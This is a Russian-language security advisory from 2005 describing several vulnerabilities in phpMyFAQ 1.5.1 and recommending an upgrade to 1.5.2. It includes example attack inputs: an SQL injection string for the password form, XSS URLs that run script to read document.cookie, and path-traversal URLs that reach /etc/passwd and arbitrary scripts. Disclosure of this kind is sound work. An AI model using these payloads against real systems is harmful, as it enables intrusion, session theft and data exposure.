Множественные уязвимости в phpMyFAQ

Дата публикации:
28.09.2005
Всего просмотров:
2261
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: phpMyFAQ 1.5.1

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, выполнить произвольные SQL команды и PHP сценарии на целевой системе.

1. SQL-инъекция обнаружена в сценарии '/admin/password.php' из-за недостаточной обработки входных данных. При выключенной опции PHP magic quotes удаленный пользователь может выполнить произвольные SQL команды на системе. Пример формы восстановления пароля:

user: ' or isnull(1/0) /*
mail: [your_email]

2. Удаленный пользователь может произвести XSS нападение и получить доступ к потенциально важным данным других пользователей. Пример:

http://[target]/[path]/phpmyfaq/admin/footer.php?
PMF_CONF[version]=<script>alert(document.c
ookie)</script>

http://[target]/[path]/phpmyfaq/admin/header.php?
PMF_LANG[metaLanguage]="><script>alert(doc
ument.cookie)</script>

3. Удаленный пользователь может выполнить произвольный PHP сценарий на системе с помощью символов обхода каталога. Пример:

http://[target]/[path]/phpmyfaq/index.php?
LANGCODE=/../../../../[scriptname]

http://[target]/[path]/phpmyfaq/index.php?
LANGCODE=/../../ ../../../../etc/passwd%00

4. Удаленный пользователь может получить доступ к лог файлу. Пример:

http://[target]/[path]/phpmyfaq/data/tracking[date]

5. Удаленный пользователь может получить данные об установочной директории приложения на сервере. Пример:

http://[target]/[path]/phpmyfaq/index.php?LANGCODE=[a_non_existent_file]

URL производителей: phpmyfaq.de

Решение: Установите последнюю версию (1.5.2) с сайта производителя.

Ссылки: PhpMyFaq 1.5.1 multiple vulnerabilities

или введите имя

CAPTCHA